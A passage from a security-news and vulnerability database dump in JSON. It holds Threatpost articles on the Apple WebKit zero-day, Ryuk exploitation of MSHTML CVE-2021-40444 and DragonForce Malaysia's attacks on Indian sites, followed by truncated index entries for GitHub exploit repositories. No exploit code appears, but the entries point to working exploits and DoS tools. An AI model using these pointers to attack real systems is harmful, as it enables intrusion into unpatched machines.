need to be connected to a Wi-Fi network in order to install the patch.\n\nFor devices that aren\u2019t yet showing that the update is ready to be installed, Kaspersky advised that systems can be forced into updating faster by going to system settings (Settings \u2192 General \u2192 Software update) and checking the availability of software updates.\n\n_021122 09:25 update: Added content from Kaspersky\u2019s post._\n\n_**Join Threatpost on **Wed. 
Feb 23 at 2 PM ET** for a **[LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>)** \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. **[REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>)** and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-11T13:45:45", "type": "threatpost", "title": "Apple Patches Actively Exploited WebKit Zero Day", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22587", "CVE-2022-22594", "CVE-2022-22620"], "modified": "2022-02-11T13:45:45", "id": 
"THREATPOST:8594A8F12FC5C97E7E62AF7B9BE3F1AA", "href": "https://threatpost.com/apple-patches-actively-exploited-webkit-zero-day/178370/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-17T12:16:20", "description": "Criminals behind the Ryuk ransomware were early exploiters of the Windows MSHTML flaw, actively leveraging the bug in campaigns ahead of a patch released by [Microsoft](<https://threatpost.com/microsoft-patch-tuesday-exploited-windows-zero-day/169459/>) this week.\n\nCollaborative research by Microsoft and RiskIQ revealed campaigns by Ryuk threat actors early on that exploited the flaw, tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). The bug is a remote code execution (RCE) vulnerability in Windows that allows attackers to craft malicious Microsoft Office documents. The two [released](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) [separate reports](<https://www.riskiq.com/blog/external-threat-management/wizard-spider-windows-0day-exploit/>) online this week to provide a look into who has been using the flaw\u2013which can be used to hide a malicious ActiveX control in an Office document\u2013in attacks, as well as their potential connections to known criminal groups.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nSpecifically, most of the attacks that researchers analyzed used MSHTML as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders, which communicated with an infrastructure that is associated with multiple cybercriminal campaigns\u2013including human-operated ransomware, researchers from the Microsoft 365 Defender Threat Intelligence Team at the Microsoft Threat Intelligence Center (MSTIC) reported.\n\nRiskIQ identified the ransomware 
infrastructure as potentially belonging to the Russian-speaking [Wizard Spider](<https://threatpost.com/wizard-spider-upgrades-ryuk-ransomware/149853/>) crime syndicate, known to maintain and distribute Ryuk ransomware.\n\n\u201cBased on multiple overlapping patterns in network infrastructure setup and use, we assess with high confidence that the operators behind the zero-day campaign are using infrastructure affiliated with Wizard Spider (CrowdStrike), and/or related groups UNC1878 (FireEye/Mandiant) and Ryuk (public), who continue to use Ryuk/Conti and BazaLoader/BazarLoader malware in targeted ransomware campaigns,\u201d RiskIQ\u2019s Team Atlas wrote in its analysis.\n\nMicrosoft stopped short of specifically identifying the threat actors observed exploiting the MSHTML flaw, instead referring to unidentified perpetrators as \u201cdevelopment groups\u201d using the prefix \u201cDEV\u201d and a number to indicate an emerging threat group.\n\n## **Separate Campaigns, Threat Actors**\n\nIn its analysis, the company cites activity from three DEV groups since August that have been seen in attacks leveraging CVE-2021-40444: DEV-0365, DEV-0193 and DEV-0413.\n\nThe infrastructure the company associates with DEV-0365 was used in the Cobalt Strike campaigns and follow-on activity, indicating \u201cmultiple threat actors or clusters associated with human-operated ransomware attacks (including the deployment of Conti ransomware),\u201d according to researchers. 
However, DEV-0365 potentially may be involved only as a command-and-control infrastructure as a service for cybercriminals, the company said.\n\n\u201cAdditionally, some of the infrastructure that hosted the oleObjects utilized in the August 2021 attacks abusing CVE-2021-40444 were also involved in the delivery of BazaLoader and Trickbot payloads \u2014 activity that overlaps with a group Microsoft tracks as DEV-0193,\u201d the team said.\n\nMicrosoft attributed another campaign using the vulnerability to a group identified as DEV-0413. This campaign is \u201csmaller and more targeted than other malware campaigns we have identified leveraging DEV-0365 infrastructure,\u201d and was observed exploiting the flaw as early as Aug. 18.\n\nThe campaign used a social-engineering lure that aligned with the business operations of targeted organizations, \u201csuggesting a degree of purposeful targeting,\u201d the company observed.\n\n\u201cThe campaign purported to seek a developer for a mobile application, with multiple application development organizations being targeted,\u201d they wrote. \u201cIn most instances, file-sharing services were abused to deliver the CVE-2021-40444-laden lure.\u201d\n\n## **History of a Vulnerability**\n\nMicrosoft first [revealed](<https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/>) the MSHTML zero-day vulnerability on Sept. 7, joining the Cybersecurity and Infrastructure Security Agency (CISA) in warning organizations of the bug and urging mitigations in separate alerts released that day.\n\nThe vulnerability allows an attacker to craft a malicious ActiveX control that can be used by a Microsoft Office document that hosts the browser rendering engine, according to Microsoft. \nSomeone would have to open the malicious document for an attack to be successful, the company said. 
This is why attackers use email campaigns with lures that appear relevant to their targets in the hopes that they will launch embedded documents, researchers said.\n\nIndeed, at least one of the campaigns Microsoft researchers observed included emails impersonating contracts and legal agreements to try to trick victims into opening the documents to distribute the payload.\n\nThough it\u2019s not completely certain if Wizard Spider is behind some of these early attacks, it\u2019s clear that ransomware operators are interested in exploiting the MSHTML flaw, according to RiskIQ.\n\nHowever, at this point, \u201cwe assume there has been limited deployment of this zero-day,\u201d researchers wrote. That means that even if known ransomware criminals are involved in the attacks, delivering ransomware may not be the ultimate goal of the campaigns, they observed.\n\n\u201cInstead, we assess with medium confidence that the goal of the operators behind the zero-day may, in fact be traditional espionage,\u201d RiskIQ\u2019s Team Atlas wrote. \u201cThis goal could easily be obscured by a ransomware deployment and blend into the current wave of targeted ransomware attacks.\u201d\n\nRegardless, organizations should take advantage of the patch Microsoft released this week for the vulnerability and update their systems now before more attacks occur, the company reiterated. \u201cCustomers are advised to apply the [security patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) for CVE-2021-40444 to fully mitigate this vulnerability,\u201d the MSTIC team wrote.
\n", "cvss3": {}, "published": "2021-09-17T12:07:59", "type": "threatpost", "title": "Microsoft MSHTML Flaw Exploited by Ryuk Ransomware Gang", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-17T12:07:59", "id": "THREATPOST:3C3F20C93519036CC712D1CA3A6D7C48", "href": "https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-15T15:52:57", "description": "According to a new [advisory](<https://www.radware.com/getattachment/bde65cb6-ace4-4dea-bce3-5f3b6cc1c951/Advisory-DragonForce-OpsPatuk-OpsIndia-final.pdf.aspx>) from Radware, a hacktivist group called DragonForce Malaysia, \u201cwith the assistance of several other threat groups, has begun indiscriminately scanning, defacing and launching denial-of-service attacks against numerous websites in India.\u201d In addition to DDoS, their targeted campaign \u2013 dubbed \u201cOpsPatuk\u201d \u2013 involves advanced threat actors \u201cleveraging current exploits, breaching networks and leaking data.\u201d\n\nDragonForce Malaysia \u2013 best known for their hacktivism in support of the 
Palestinian cause \u2013 have turned their attention to India this time, in response to a controversial comment made by a Hindu political spokesperson about the Prophet Mohammed.\n\nAccording to the advisory, OpsPatuk remains ongoing today.\n\n## The Casus Belli\n\nIn a televised debate last month, Nupur Sharma \u2013 a spokesperson for the Hindu nationalist Bharatiya Janata Party (BJP) \u2013 made controversial remarks regarding the age of the Prophet Mohammed\u2019s third wife, Aisha. Widespread outrage followed, involving statements from leaders in the Muslim world, widespread protests, and the ousting of Sharma herself from BJP.\n\nThen, beginning on June 10, DragonForce Malaysia entered the fray. Their new offensive against the government of India was first enshrined in a [tweet](<https://twitter.com/DragonForceIO/status/1535273727755096064?ref_src=twsrc%5Etfw>):\n\n_Greetings The Government of India. We Are DragonForce Malaysia. This is a special operation on the insult of our Prophet Muhammad S.A.W. India Government website hacked by DragonForce Malaysia. We will never remain silent. Come Join This Operation ! #OpsPatuk Engaged_\n\n(image from @DragonForceIO on Twitter)\n\nThe new advisory confirms that the group has used DDoS to perform \u201cnumerous defacements across India,\u201d pasting their logo and messaging to targeted websites.\n\nThe group also \u201cclaimed to have breached and leaked data from various government agencies, financial institutions, universities, service providers, and several other Indian databases.\u201d\n\nThe researchers also observed other hacktivists \u2013 \u2018Localhost\u2019, \u2018M4NGTX\u2019, \u20181887\u2019, and \u2018RzkyO\u2019 \u2013 joining the party, \u201cdefacing multiple websites across India in the name of their religion.\u201d\n\n## Who are DragonForce Malaysia?\n\nDragonForce Malaysia is a hacktivist group in the vein of Anonymous. 
They\u2019re connected by political goals, with a penchant for sensationalism. Their social media channels and website forums \u2013 used for everything \u201cranging from running an eSports team to launching cyberattacks\u201d \u2013 are visited by tens of thousands of users.\n\nIn the past, DragonForce have launched attacks against organizations and government entities across the Middle East and Asia. Their favorite target has been Israel, having launched multiple operations \u2013 #OpsBedil, #OpsBedilReloaded and #OpsRWM \u2013 against the nation and its citizens.\n\nAccording to the authors of the advisory, DragonForce are \u201cnot considered an advanced or a persistent threat group, nor are they currently considered to be sophisticated. But where they lack sophistication, they make up for it with their organizational skills and ability to quickly disseminate information to other members.\u201d Like Anonymous with the Low Orbit Ion Cannon, DragonForce weaponizes their own open source DoS tools \u2013 Slowloris, DDoSTool, DDoS-Ripper, Hammer, and more \u2013 in choreographed, flashy website defacements.\n\nSome members, \u201cover the last year, have demonstrated the ability and desire to evolve into a highly sophisticated threat group.\u201d Among other things, that\u2019s included leveraging publicly disclosed vulnerabilities. In OpsPatuk, for example, they\u2019ve been working with the recently discovered [CVE-2022-26134](<https://threatpost.com/public-exploits-atlassian-confluence-flaw/179887/>).\n\n\u201cDragonForce Malaysia and its associates have proven their ability to adapt and evolve with the threat landscape in the last year,\u201d concluded the authors. 
With no signs of slowing down, \u201cRadware expects DragonForce Malaysia to continue launching new reactionary campaigns based on their social, political, and religious affiliations in the foreseeable future.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-15T13:59:37", "type": "threatpost", "title": "DragonForce Gang Unleash Hacks Against Govt. of India", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-15T13:59:37", "id": "THREATPOST:8C179A769DB315AF46676A862FC3D942", "href": "https://threatpost.com/hackers-india-government/179968/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-04-04T13:00:38", "description": "# CVE-2022-21882\nwin32k LPE bypass CVE-2021-1732\n\n## Test\n- only...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": 
"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-01T17:58:29", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-04-04T09:10:13", "id": "453B4EEE-340B-58DA-84D9-277C9D4EFC12", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-04T07:51:24", "description": "# CVE-2022-21882\nwin32k LPE bypass CVE-2021-17...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-27T03:44:10", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": 
"AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-04-04T04:45:33", "id": "1C45657B-E388-5668-9093-F3934858B728", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-16T00:00:34", "description": "# CVE-2022-21882\n\nWin32k Elevation Of Privileges\n\nTechn...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-14T21:28:15", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21882", "CVE-2021-1732"], "modified": "2022-03-15T22:03:21", "id": "FBC7C8E7-D9E9-50AF-A463-1504B4FC5BE9", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-15T20:28:07", "description": "# CVE-2021-1732\n\nWin32k Elevation Of Privileges\n\nTechni...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": 
"HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-15T16:55:31", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-02-15T17:00:00", "id": "25DCDCD3-A32C-5B44-B706-FFF9535ECFC2", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-01T06:07:29", "description": "# CVE-2021-30551\n\nMy exp for chrome V8...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-08-22T14:15:23", "type": "githubexploit", "title": "Exploit for Type Confusion in Google Chrome", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, 
"userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30551"], "modified": "2022-04-01T03:53:55", "id": "55D44407-F5C9-50A9-B51D-0D4F668CD993", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-23T04:27:16", "description": "# CVE-2021-26084\nAtlassian Confluence CVE-2021-26084 one-liner ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T01:15:16", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-02-22T21:21:20", "id": "A4DD8B03-CBED-5284-83EA-6C21FE0EA21C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, 
"privateArea": 1}, {"lastseen": "2023-09-11T11:49:33", "description": "# CVE-2021-26084-EXP\r\n\r\nThis code is an exploit for the CVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-03T07:31:29", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-09-11T11:40:35", "id": "5DB14853-1EDB-5A80-BD98-BB388CC80401", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:05:07", "description": "# CVE-2022-21882\n\nWin32k Elevation...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-03T11:25:14", "type": "githubexploit", 
"title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21882"], "modified": "2023-09-16T21:50:57", "id": "9C08AAB4-D76D-550C-ADA2-175E9AC92E38", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:00", "description": "# CVE-2021-40444 Analysis\n\nThis repository contains the deobfusc...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-09T15:43:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T08:18:40", "id": "7333A285-768C-5AD9-B64E-0EC75F075597", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:36:46", "description": "# CVE-2021-40444\n\n## Usage\n\nEnsure to run `setup.sh` first as yo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-03T01:13:42", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-09-16T21:47:57", "id": "9366C7C7-BF57-5CFF-A1B5-8D8CF169E72A", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:35:39", "description": "# cve-2021-40444\nReverse engineering the \"A Letter Before Court ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, 
"privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-12T09:27:40", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-12T12:00:29", "id": "E06577DB-A581-55E1-968E-81430C294A84", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:15", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": 